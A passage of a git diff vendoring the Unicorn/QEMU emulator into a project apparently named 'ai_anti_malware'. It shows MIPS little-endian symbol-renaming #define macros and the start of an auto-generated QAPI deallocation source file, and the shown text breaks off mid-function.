+#define helper_ctc1 helper_ctc1_mipsel +#define ieee_ex_to_mips ieee_ex_to_mips_mipsel +#define helper_float_sqrt_d helper_float_sqrt_d_mipsel +#define helper_float_sqrt_s helper_float_sqrt_s_mipsel +#define helper_float_cvtd_s helper_float_cvtd_s_mipsel +#define helper_float_cvtd_w helper_float_cvtd_w_mipsel +#define helper_float_cvtd_l helper_float_cvtd_l_mipsel +#define helper_float_cvtl_d helper_float_cvtl_d_mipsel +#define helper_float_cvtl_s helper_float_cvtl_s_mipsel +#define helper_float_cvtps_pw helper_float_cvtps_pw_mipsel +#define helper_float_cvtpw_ps helper_float_cvtpw_ps_mipsel +#define helper_float_cvts_d helper_float_cvts_d_mipsel +#define helper_float_cvts_w helper_float_cvts_w_mipsel +#define helper_float_cvts_l helper_float_cvts_l_mipsel +#define helper_float_cvts_pl helper_float_cvts_pl_mipsel +#define helper_float_cvts_pu helper_float_cvts_pu_mipsel +#define helper_float_cvtw_s helper_float_cvtw_s_mipsel +#define helper_float_cvtw_d helper_float_cvtw_d_mipsel +#define helper_float_roundl_d helper_float_roundl_d_mipsel +#define helper_float_roundl_s helper_float_roundl_s_mipsel +#define helper_float_roundw_d helper_float_roundw_d_mipsel +#define helper_float_roundw_s helper_float_roundw_s_mipsel +#define helper_float_truncl_d helper_float_truncl_d_mipsel +#define helper_float_truncl_s helper_float_truncl_s_mipsel +#define helper_float_truncw_d helper_float_truncw_d_mipsel +#define helper_float_truncw_s helper_float_truncw_s_mipsel +#define helper_float_ceill_d helper_float_ceill_d_mipsel +#define helper_float_ceill_s helper_float_ceill_s_mipsel +#define helper_float_ceilw_d helper_float_ceilw_d_mipsel +#define helper_float_ceilw_s helper_float_ceilw_s_mipsel +#define helper_float_floorl_d helper_float_floorl_d_mipsel +#define helper_float_floorl_s helper_float_floorl_s_mipsel +#define helper_float_floorw_d helper_float_floorw_d_mipsel +#define helper_float_floorw_s helper_float_floorw_s_mipsel +#define helper_float_abs_d 
helper_float_abs_d_mipsel +#define helper_float_abs_s helper_float_abs_s_mipsel +#define helper_float_abs_ps helper_float_abs_ps_mipsel +#define helper_float_chs_d helper_float_chs_d_mipsel +#define helper_float_chs_s helper_float_chs_s_mipsel +#define helper_float_chs_ps helper_float_chs_ps_mipsel +#define helper_float_maddf_s helper_float_maddf_s_mipsel +#define helper_float_maddf_d helper_float_maddf_d_mipsel +#define helper_float_msubf_s helper_float_msubf_s_mipsel +#define helper_float_msubf_d helper_float_msubf_d_mipsel +#define helper_float_max_s helper_float_max_s_mipsel +#define helper_float_max_d helper_float_max_d_mipsel +#define helper_float_maxa_s helper_float_maxa_s_mipsel +#define helper_float_maxa_d helper_float_maxa_d_mipsel +#define helper_float_min_s helper_float_min_s_mipsel +#define helper_float_min_d helper_float_min_d_mipsel +#define helper_float_mina_s helper_float_mina_s_mipsel +#define helper_float_mina_d helper_float_mina_d_mipsel +#define helper_float_rint_s helper_float_rint_s_mipsel +#define helper_float_rint_d helper_float_rint_d_mipsel +#define helper_float_class_s helper_float_class_s_mipsel +#define helper_float_class_d helper_float_class_d_mipsel +#define helper_float_recip_d helper_float_recip_d_mipsel +#define helper_float_recip_s helper_float_recip_s_mipsel +#define helper_float_rsqrt_d helper_float_rsqrt_d_mipsel +#define helper_float_rsqrt_s helper_float_rsqrt_s_mipsel +#define helper_float_recip1_d helper_float_recip1_d_mipsel +#define helper_float_recip1_s helper_float_recip1_s_mipsel +#define helper_float_recip1_ps helper_float_recip1_ps_mipsel +#define helper_float_rsqrt1_d helper_float_rsqrt1_d_mipsel +#define helper_float_rsqrt1_s helper_float_rsqrt1_s_mipsel +#define helper_float_rsqrt1_ps helper_float_rsqrt1_ps_mipsel +#define helper_float_add_d helper_float_add_d_mipsel +#define helper_float_add_s helper_float_add_s_mipsel +#define helper_float_add_ps helper_float_add_ps_mipsel +#define helper_float_sub_d 
helper_float_sub_d_mipsel +#define helper_float_sub_s helper_float_sub_s_mipsel +#define helper_float_sub_ps helper_float_sub_ps_mipsel +#define helper_float_mul_d helper_float_mul_d_mipsel +#define helper_float_mul_s helper_float_mul_s_mipsel +#define helper_float_mul_ps helper_float_mul_ps_mipsel +#define helper_float_div_d helper_float_div_d_mipsel +#define helper_float_div_s helper_float_div_s_mipsel +#define helper_float_div_ps helper_float_div_ps_mipsel +#define helper_float_madd_d helper_float_madd_d_mipsel +#define helper_float_madd_s helper_float_madd_s_mipsel +#define helper_float_madd_ps helper_float_madd_ps_mipsel +#define helper_float_msub_d helper_float_msub_d_mipsel +#define helper_float_msub_s helper_float_msub_s_mipsel +#define helper_float_msub_ps helper_float_msub_ps_mipsel +#define helper_float_nmadd_d helper_float_nmadd_d_mipsel +#define helper_float_nmadd_s helper_float_nmadd_s_mipsel +#define helper_float_nmadd_ps helper_float_nmadd_ps_mipsel +#define helper_float_nmsub_d helper_float_nmsub_d_mipsel +#define helper_float_nmsub_s helper_float_nmsub_s_mipsel +#define helper_float_nmsub_ps helper_float_nmsub_ps_mipsel +#define helper_float_recip2_d helper_float_recip2_d_mipsel +#define helper_float_recip2_s helper_float_recip2_s_mipsel +#define helper_float_recip2_ps helper_float_recip2_ps_mipsel +#define helper_float_rsqrt2_d helper_float_rsqrt2_d_mipsel +#define helper_float_rsqrt2_s helper_float_rsqrt2_s_mipsel +#define helper_float_rsqrt2_ps helper_float_rsqrt2_ps_mipsel +#define helper_float_addr_ps helper_float_addr_ps_mipsel +#define helper_float_mulr_ps helper_float_mulr_ps_mipsel +#define helper_cmp_d_f helper_cmp_d_f_mipsel +#define helper_cmpabs_d_f helper_cmpabs_d_f_mipsel +#define helper_cmp_d_un helper_cmp_d_un_mipsel +#define helper_cmpabs_d_un helper_cmpabs_d_un_mipsel +#define helper_cmp_d_eq helper_cmp_d_eq_mipsel +#define helper_cmpabs_d_eq helper_cmpabs_d_eq_mipsel +#define helper_cmp_d_ueq helper_cmp_d_ueq_mipsel +#define 
helper_cmpabs_d_ueq helper_cmpabs_d_ueq_mipsel +#define helper_cmp_d_olt helper_cmp_d_olt_mipsel +#define helper_cmpabs_d_olt helper_cmpabs_d_olt_mipsel +#define helper_cmp_d_ult helper_cmp_d_ult_mipsel +#define helper_cmpabs_d_ult helper_cmpabs_d_ult_mipsel +#define helper_cmp_d_ole helper_cmp_d_ole_mipsel +#define helper_cmpabs_d_ole helper_cmpabs_d_ole_mipsel +#define helper_cmp_d_ule helper_cmp_d_ule_mipsel +#define helper_cmpabs_d_ule helper_cmpabs_d_ule_mipsel +#define helper_cmp_d_sf helper_cmp_d_sf_mipsel +#define helper_cmpabs_d_sf helper_cmpabs_d_sf_mipsel +#define helper_cmp_d_ngle helper_cmp_d_ngle_mipsel +#define helper_cmpabs_d_ngle helper_cmpabs_d_ngle_mipsel +#define helper_cmp_d_seq helper_cmp_d_seq_mipsel +#define helper_cmpabs_d_seq helper_cmpabs_d_seq_mipsel +#define helper_cmp_d_ngl helper_cmp_d_ngl_mipsel +#define helper_cmpabs_d_ngl helper_cmpabs_d_ngl_mipsel +#define helper_cmp_d_lt helper_cmp_d_lt_mipsel +#define helper_cmpabs_d_lt helper_cmpabs_d_lt_mipsel +#define helper_cmp_d_nge helper_cmp_d_nge_mipsel +#define helper_cmpabs_d_nge helper_cmpabs_d_nge_mipsel +#define helper_cmp_d_le helper_cmp_d_le_mipsel +#define helper_cmpabs_d_le helper_cmpabs_d_le_mipsel +#define helper_cmp_d_ngt helper_cmp_d_ngt_mipsel +#define helper_cmpabs_d_ngt helper_cmpabs_d_ngt_mipsel +#define helper_cmp_s_f helper_cmp_s_f_mipsel +#define helper_cmpabs_s_f helper_cmpabs_s_f_mipsel +#define helper_cmp_s_un helper_cmp_s_un_mipsel +#define helper_cmpabs_s_un helper_cmpabs_s_un_mipsel +#define helper_cmp_s_eq helper_cmp_s_eq_mipsel +#define helper_cmpabs_s_eq helper_cmpabs_s_eq_mipsel +#define helper_cmp_s_ueq helper_cmp_s_ueq_mipsel +#define helper_cmpabs_s_ueq helper_cmpabs_s_ueq_mipsel +#define helper_cmp_s_olt helper_cmp_s_olt_mipsel +#define helper_cmpabs_s_olt helper_cmpabs_s_olt_mipsel +#define helper_cmp_s_ult helper_cmp_s_ult_mipsel +#define helper_cmpabs_s_ult helper_cmpabs_s_ult_mipsel +#define helper_cmp_s_ole helper_cmp_s_ole_mipsel +#define 
helper_cmpabs_s_ole helper_cmpabs_s_ole_mipsel +#define helper_cmp_s_ule helper_cmp_s_ule_mipsel +#define helper_cmpabs_s_ule helper_cmpabs_s_ule_mipsel +#define helper_cmp_s_sf helper_cmp_s_sf_mipsel +#define helper_cmpabs_s_sf helper_cmpabs_s_sf_mipsel +#define helper_cmp_s_ngle helper_cmp_s_ngle_mipsel +#define helper_cmpabs_s_ngle helper_cmpabs_s_ngle_mipsel +#define helper_cmp_s_seq helper_cmp_s_seq_mipsel +#define helper_cmpabs_s_seq helper_cmpabs_s_seq_mipsel +#define helper_cmp_s_ngl helper_cmp_s_ngl_mipsel +#define helper_cmpabs_s_ngl helper_cmpabs_s_ngl_mipsel +#define helper_cmp_s_lt helper_cmp_s_lt_mipsel +#define helper_cmpabs_s_lt helper_cmpabs_s_lt_mipsel +#define helper_cmp_s_nge helper_cmp_s_nge_mipsel +#define helper_cmpabs_s_nge helper_cmpabs_s_nge_mipsel +#define helper_cmp_s_le helper_cmp_s_le_mipsel +#define helper_cmpabs_s_le helper_cmpabs_s_le_mipsel +#define helper_cmp_s_ngt helper_cmp_s_ngt_mipsel +#define helper_cmpabs_s_ngt helper_cmpabs_s_ngt_mipsel +#define helper_cmp_ps_f helper_cmp_ps_f_mipsel +#define helper_cmpabs_ps_f helper_cmpabs_ps_f_mipsel +#define helper_cmp_ps_un helper_cmp_ps_un_mipsel +#define helper_cmpabs_ps_un helper_cmpabs_ps_un_mipsel +#define helper_cmp_ps_eq helper_cmp_ps_eq_mipsel +#define helper_cmpabs_ps_eq helper_cmpabs_ps_eq_mipsel +#define helper_cmp_ps_ueq helper_cmp_ps_ueq_mipsel +#define helper_cmpabs_ps_ueq helper_cmpabs_ps_ueq_mipsel +#define helper_cmp_ps_olt helper_cmp_ps_olt_mipsel +#define helper_cmpabs_ps_olt helper_cmpabs_ps_olt_mipsel +#define helper_cmp_ps_ult helper_cmp_ps_ult_mipsel +#define helper_cmpabs_ps_ult helper_cmpabs_ps_ult_mipsel +#define helper_cmp_ps_ole helper_cmp_ps_ole_mipsel +#define helper_cmpabs_ps_ole helper_cmpabs_ps_ole_mipsel +#define helper_cmp_ps_ule helper_cmp_ps_ule_mipsel +#define helper_cmpabs_ps_ule helper_cmpabs_ps_ule_mipsel +#define helper_cmp_ps_sf helper_cmp_ps_sf_mipsel +#define helper_cmpabs_ps_sf helper_cmpabs_ps_sf_mipsel +#define helper_cmp_ps_ngle 
helper_cmp_ps_ngle_mipsel +#define helper_cmpabs_ps_ngle helper_cmpabs_ps_ngle_mipsel +#define helper_cmp_ps_seq helper_cmp_ps_seq_mipsel +#define helper_cmpabs_ps_seq helper_cmpabs_ps_seq_mipsel +#define helper_cmp_ps_ngl helper_cmp_ps_ngl_mipsel +#define helper_cmpabs_ps_ngl helper_cmpabs_ps_ngl_mipsel +#define helper_cmp_ps_lt helper_cmp_ps_lt_mipsel +#define helper_cmpabs_ps_lt helper_cmpabs_ps_lt_mipsel +#define helper_cmp_ps_nge helper_cmp_ps_nge_mipsel +#define helper_cmpabs_ps_nge helper_cmpabs_ps_nge_mipsel +#define helper_cmp_ps_le helper_cmp_ps_le_mipsel +#define helper_cmpabs_ps_le helper_cmpabs_ps_le_mipsel +#define helper_cmp_ps_ngt helper_cmp_ps_ngt_mipsel +#define helper_cmpabs_ps_ngt helper_cmpabs_ps_ngt_mipsel +#define helper_r6_cmp_d_af helper_r6_cmp_d_af_mipsel +#define helper_r6_cmp_d_un helper_r6_cmp_d_un_mipsel +#define helper_r6_cmp_d_eq helper_r6_cmp_d_eq_mipsel +#define helper_r6_cmp_d_ueq helper_r6_cmp_d_ueq_mipsel +#define helper_r6_cmp_d_lt helper_r6_cmp_d_lt_mipsel +#define helper_r6_cmp_d_ult helper_r6_cmp_d_ult_mipsel +#define helper_r6_cmp_d_le helper_r6_cmp_d_le_mipsel +#define helper_r6_cmp_d_ule helper_r6_cmp_d_ule_mipsel +#define helper_r6_cmp_d_saf helper_r6_cmp_d_saf_mipsel +#define helper_r6_cmp_d_sun helper_r6_cmp_d_sun_mipsel +#define helper_r6_cmp_d_seq helper_r6_cmp_d_seq_mipsel +#define helper_r6_cmp_d_sueq helper_r6_cmp_d_sueq_mipsel +#define helper_r6_cmp_d_slt helper_r6_cmp_d_slt_mipsel +#define helper_r6_cmp_d_sult helper_r6_cmp_d_sult_mipsel +#define helper_r6_cmp_d_sle helper_r6_cmp_d_sle_mipsel +#define helper_r6_cmp_d_sule helper_r6_cmp_d_sule_mipsel +#define helper_r6_cmp_d_or helper_r6_cmp_d_or_mipsel +#define helper_r6_cmp_d_une helper_r6_cmp_d_une_mipsel +#define helper_r6_cmp_d_ne helper_r6_cmp_d_ne_mipsel +#define helper_r6_cmp_d_sor helper_r6_cmp_d_sor_mipsel +#define helper_r6_cmp_d_sune helper_r6_cmp_d_sune_mipsel +#define helper_r6_cmp_d_sne helper_r6_cmp_d_sne_mipsel +#define helper_r6_cmp_s_af 
helper_r6_cmp_s_af_mipsel +#define helper_r6_cmp_s_un helper_r6_cmp_s_un_mipsel +#define helper_r6_cmp_s_eq helper_r6_cmp_s_eq_mipsel +#define helper_r6_cmp_s_ueq helper_r6_cmp_s_ueq_mipsel +#define helper_r6_cmp_s_lt helper_r6_cmp_s_lt_mipsel +#define helper_r6_cmp_s_ult helper_r6_cmp_s_ult_mipsel +#define helper_r6_cmp_s_le helper_r6_cmp_s_le_mipsel +#define helper_r6_cmp_s_ule helper_r6_cmp_s_ule_mipsel +#define helper_r6_cmp_s_saf helper_r6_cmp_s_saf_mipsel +#define helper_r6_cmp_s_sun helper_r6_cmp_s_sun_mipsel +#define helper_r6_cmp_s_seq helper_r6_cmp_s_seq_mipsel +#define helper_r6_cmp_s_sueq helper_r6_cmp_s_sueq_mipsel +#define helper_r6_cmp_s_slt helper_r6_cmp_s_slt_mipsel +#define helper_r6_cmp_s_sult helper_r6_cmp_s_sult_mipsel +#define helper_r6_cmp_s_sle helper_r6_cmp_s_sle_mipsel +#define helper_r6_cmp_s_sule helper_r6_cmp_s_sule_mipsel +#define helper_r6_cmp_s_or helper_r6_cmp_s_or_mipsel +#define helper_r6_cmp_s_une helper_r6_cmp_s_une_mipsel +#define helper_r6_cmp_s_ne helper_r6_cmp_s_ne_mipsel +#define helper_r6_cmp_s_sor helper_r6_cmp_s_sor_mipsel +#define helper_r6_cmp_s_sune helper_r6_cmp_s_sune_mipsel +#define helper_r6_cmp_s_sne helper_r6_cmp_s_sne_mipsel +#define helper_msa_ld_df helper_msa_ld_df_mipsel +#define helper_msa_st_df helper_msa_st_df_mipsel +#define no_mmu_map_address no_mmu_map_address_mipsel +#define fixed_mmu_map_address fixed_mmu_map_address_mipsel +#define r4k_map_address r4k_map_address_mipsel +#define mips_cpu_get_phys_page_debug mips_cpu_get_phys_page_debug_mipsel +#define mips_cpu_handle_mmu_fault mips_cpu_handle_mmu_fault_mipsel +#define cpu_mips_translate_address cpu_mips_translate_address_mipsel +#define exception_resume_pc exception_resume_pc_mipsel +#define mips_cpu_do_interrupt mips_cpu_do_interrupt_mipsel +#define mips_cpu_exec_interrupt mips_cpu_exec_interrupt_mipsel +#define r4k_invalidate_tlb r4k_invalidate_tlb_mipsel +#define helper_absq_s_ob helper_absq_s_ob_mipsel +#define helper_absq_s_qh 
helper_absq_s_qh_mipsel +#define helper_absq_s_pw helper_absq_s_pw_mipsel +#define helper_adduh_ob helper_adduh_ob_mipsel +#define helper_adduh_r_ob helper_adduh_r_ob_mipsel +#define helper_subuh_ob helper_subuh_ob_mipsel +#define helper_subuh_r_ob helper_subuh_r_ob_mipsel +#define helper_addq_pw helper_addq_pw_mipsel +#define helper_addq_qh helper_addq_qh_mipsel +#define helper_addq_s_pw helper_addq_s_pw_mipsel +#define helper_addq_s_qh helper_addq_s_qh_mipsel +#define helper_addu_ob helper_addu_ob_mipsel +#define helper_addu_qh helper_addu_qh_mipsel +#define helper_addu_s_ob helper_addu_s_ob_mipsel +#define helper_addu_s_qh helper_addu_s_qh_mipsel +#define helper_subq_pw helper_subq_pw_mipsel +#define helper_subq_qh helper_subq_qh_mipsel +#define helper_subq_s_pw helper_subq_s_pw_mipsel +#define helper_subq_s_qh helper_subq_s_qh_mipsel +#define helper_subu_ob helper_subu_ob_mipsel +#define helper_subu_qh helper_subu_qh_mipsel +#define helper_subu_s_ob helper_subu_s_ob_mipsel +#define helper_subu_s_qh helper_subu_s_qh_mipsel +#define helper_raddu_l_ob helper_raddu_l_ob_mipsel +#define helper_precr_ob_qh helper_precr_ob_qh_mipsel +#define helper_precr_sra_qh_pw helper_precr_sra_qh_pw_mipsel +#define helper_precr_sra_r_qh_pw helper_precr_sra_r_qh_pw_mipsel +#define helper_precrq_ob_qh helper_precrq_ob_qh_mipsel +#define helper_precrq_qh_pw helper_precrq_qh_pw_mipsel +#define helper_precrq_rs_qh_pw helper_precrq_rs_qh_pw_mipsel +#define helper_precrq_pw_l helper_precrq_pw_l_mipsel +#define helper_precrqu_s_ob_qh helper_precrqu_s_ob_qh_mipsel +#define helper_preceq_pw_qhl helper_preceq_pw_qhl_mipsel +#define helper_preceq_pw_qhr helper_preceq_pw_qhr_mipsel +#define helper_preceq_pw_qhla helper_preceq_pw_qhla_mipsel +#define helper_preceq_pw_qhra helper_preceq_pw_qhra_mipsel +#define helper_precequ_qh_obl helper_precequ_qh_obl_mipsel +#define helper_precequ_qh_obr helper_precequ_qh_obr_mipsel +#define helper_precequ_qh_obla helper_precequ_qh_obla_mipsel +#define 
helper_precequ_qh_obra helper_precequ_qh_obra_mipsel +#define helper_preceu_qh_obl helper_preceu_qh_obl_mipsel +#define helper_preceu_qh_obr helper_preceu_qh_obr_mipsel +#define helper_preceu_qh_obla helper_preceu_qh_obla_mipsel +#define helper_preceu_qh_obra helper_preceu_qh_obra_mipsel +#define helper_shll_ob helper_shll_ob_mipsel +#define helper_shrl_ob helper_shrl_ob_mipsel +#define helper_shra_ob helper_shra_ob_mipsel +#define helper_shra_r_ob helper_shra_r_ob_mipsel +#define helper_shll_qh helper_shll_qh_mipsel +#define helper_shll_s_qh helper_shll_s_qh_mipsel +#define helper_shrl_qh helper_shrl_qh_mipsel +#define helper_shra_qh helper_shra_qh_mipsel +#define helper_shra_r_qh helper_shra_r_qh_mipsel +#define helper_shll_pw helper_shll_pw_mipsel +#define helper_shll_s_pw helper_shll_s_pw_mipsel +#define helper_shra_pw helper_shra_pw_mipsel +#define helper_shra_r_pw helper_shra_r_pw_mipsel +#define helper_muleu_s_qh_obl helper_muleu_s_qh_obl_mipsel +#define helper_muleu_s_qh_obr helper_muleu_s_qh_obr_mipsel +#define helper_mulq_rs_qh helper_mulq_rs_qh_mipsel +#define helper_muleq_s_pw_qhl helper_muleq_s_pw_qhl_mipsel +#define helper_muleq_s_pw_qhr helper_muleq_s_pw_qhr_mipsel +#define helper_mulsaq_s_w_qh helper_mulsaq_s_w_qh_mipsel +#define helper_dpau_h_obl helper_dpau_h_obl_mipsel +#define helper_dpau_h_obr helper_dpau_h_obr_mipsel +#define helper_dpsu_h_obl helper_dpsu_h_obl_mipsel +#define helper_dpsu_h_obr helper_dpsu_h_obr_mipsel +#define helper_dpa_w_qh helper_dpa_w_qh_mipsel +#define helper_dpaq_s_w_qh helper_dpaq_s_w_qh_mipsel +#define helper_dps_w_qh helper_dps_w_qh_mipsel +#define helper_dpsq_s_w_qh helper_dpsq_s_w_qh_mipsel +#define helper_dpaq_sa_l_pw helper_dpaq_sa_l_pw_mipsel +#define helper_dpsq_sa_l_pw helper_dpsq_sa_l_pw_mipsel +#define helper_mulsaq_s_l_pw helper_mulsaq_s_l_pw_mipsel +#define helper_maq_s_w_qhll helper_maq_s_w_qhll_mipsel +#define helper_maq_s_w_qhlr helper_maq_s_w_qhlr_mipsel +#define helper_maq_s_w_qhrl 
helper_maq_s_w_qhrl_mipsel +#define helper_maq_s_w_qhrr helper_maq_s_w_qhrr_mipsel +#define helper_maq_sa_w_qhll helper_maq_sa_w_qhll_mipsel +#define helper_maq_sa_w_qhlr helper_maq_sa_w_qhlr_mipsel +#define helper_maq_sa_w_qhrl helper_maq_sa_w_qhrl_mipsel +#define helper_maq_sa_w_qhrr helper_maq_sa_w_qhrr_mipsel +#define helper_maq_s_l_pwl helper_maq_s_l_pwl_mipsel +#define helper_maq_s_l_pwr helper_maq_s_l_pwr_mipsel +#define helper_dmadd helper_dmadd_mipsel +#define helper_dmaddu helper_dmaddu_mipsel +#define helper_dmsub helper_dmsub_mipsel +#define helper_dmsubu helper_dmsubu_mipsel +#define helper_dinsv helper_dinsv_mipsel +#define helper_cmpgu_eq_ob helper_cmpgu_eq_ob_mipsel +#define helper_cmpgu_lt_ob helper_cmpgu_lt_ob_mipsel +#define helper_cmpgu_le_ob helper_cmpgu_le_ob_mipsel +#define helper_cmpu_eq_ob helper_cmpu_eq_ob_mipsel +#define helper_cmpu_lt_ob helper_cmpu_lt_ob_mipsel +#define helper_cmpu_le_ob helper_cmpu_le_ob_mipsel +#define helper_cmp_eq_qh helper_cmp_eq_qh_mipsel +#define helper_cmp_lt_qh helper_cmp_lt_qh_mipsel +#define helper_cmp_le_qh helper_cmp_le_qh_mipsel +#define helper_cmp_eq_pw helper_cmp_eq_pw_mipsel +#define helper_cmp_lt_pw helper_cmp_lt_pw_mipsel +#define helper_cmp_le_pw helper_cmp_le_pw_mipsel +#define helper_cmpgdu_eq_ob helper_cmpgdu_eq_ob_mipsel +#define helper_cmpgdu_lt_ob helper_cmpgdu_lt_ob_mipsel +#define helper_cmpgdu_le_ob helper_cmpgdu_le_ob_mipsel +#define helper_pick_ob helper_pick_ob_mipsel +#define helper_pick_qh helper_pick_qh_mipsel +#define helper_pick_pw helper_pick_pw_mipsel +#define helper_packrl_pw helper_packrl_pw_mipsel +#define helper_dextr_w helper_dextr_w_mipsel +#define helper_dextr_r_w helper_dextr_r_w_mipsel +#define helper_dextr_rs_w helper_dextr_rs_w_mipsel +#define helper_dextr_l helper_dextr_l_mipsel +#define helper_dextr_r_l helper_dextr_r_l_mipsel +#define helper_dextr_rs_l helper_dextr_rs_l_mipsel +#define helper_dextr_s_h helper_dextr_s_h_mipsel +#define helper_dextp helper_dextp_mipsel 
+#define helper_dextpdp helper_dextpdp_mipsel +#define helper_dshilo helper_dshilo_mipsel +#define helper_dmthlip helper_dmthlip_mipsel +#define helper_dclo helper_dclo_mipsel +#define helper_dclz helper_dclz_mipsel +#define helper_dbitswap helper_dbitswap_mipsel +#define helper_lld helper_lld_mipsel +#define helper_scd helper_scd_mipsel +#define helper_sdl helper_sdl_mipsel +#define helper_sdr helper_sdr_mipsel +#define helper_ldm helper_ldm_mipsel +#define helper_sdm helper_sdm_mipsel +#define helper_dmfc0_tcrestart helper_dmfc0_tcrestart_mipsel +#define helper_dmfc0_tchalt helper_dmfc0_tchalt_mipsel +#define helper_dmfc0_tccontext helper_dmfc0_tccontext_mipsel +#define helper_dmfc0_tcschedule helper_dmfc0_tcschedule_mipsel +#define helper_dmfc0_tcschefback helper_dmfc0_tcschefback_mipsel +#define helper_dmfc0_lladdr helper_dmfc0_lladdr_mipsel +#define helper_dmfc0_watchlo helper_dmfc0_watchlo_mipsel +#define helper_dmtc0_entrylo0 helper_dmtc0_entrylo0_mipsel +#define helper_dmtc0_entrylo1 helper_dmtc0_entrylo1_mipsel +#define mips_reg_reset mips_reg_reset_mipsel +#define mips_reg_read mips_reg_read_mipsel +#define mips_reg_write mips_reg_write_mipsel +#define mips_tcg_init mips_tcg_init_mipsel +#define mips_cpu_list mips_cpu_list_mipsel +#define mips_release mips_release_mipsel +#define MIPS64_REGS_STORAGE_SIZE MIPS64_REGS_STORAGE_SIZE_mipsel +#define MIPS_REGS_STORAGE_SIZE MIPS_REGS_STORAGE_SIZE_mipsel +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-types.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-types.c new file mode 100644 index 0000000..173c654 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-types.c @@ -0,0 +1,293 @@ +/* AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * deallocation functions for schema-defined QAPI types + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * Michael Roth + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. 
+ * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qapi/dealloc-visitor.h" +#include "qapi-types.h" +#include "qapi-visit.h" + +const char *ErrorClass_lookup[] = { + "GenericError", + "CommandNotFound", + "DeviceEncrypted", + "DeviceNotActive", + "DeviceNotFound", + "KVMMissingCap", + NULL, +}; + +const char *X86CPURegister32_lookup[] = { + "EAX", + "EBX", + "ECX", + "EDX", + "ESP", + "EBP", + "ESI", + "EDI", + NULL, +}; + + +#ifndef QAPI_TYPES_BUILTIN_CLEANUP_DEF_H +#define QAPI_TYPES_BUILTIN_CLEANUP_DEF_H + + +void qapi_free_strList(strList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_strList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_intList(intList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_intList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_numberList(numberList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_numberList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_boolList(boolList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_boolList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_int8List(int8List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_int8List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_int16List(int16List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) 
{ + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_int16List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_int32List(int32List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_int32List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_int64List(int64List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_int64List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_uint8List(uint8List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_uint8List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_uint16List(uint16List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_uint16List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_uint32List(uint32List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_uint32List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +void qapi_free_uint64List(uint64List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_uint64List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + +#endif /* QAPI_TYPES_BUILTIN_CLEANUP_DEF_H */ + + +void qapi_free_ErrorClassList(ErrorClassList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; 
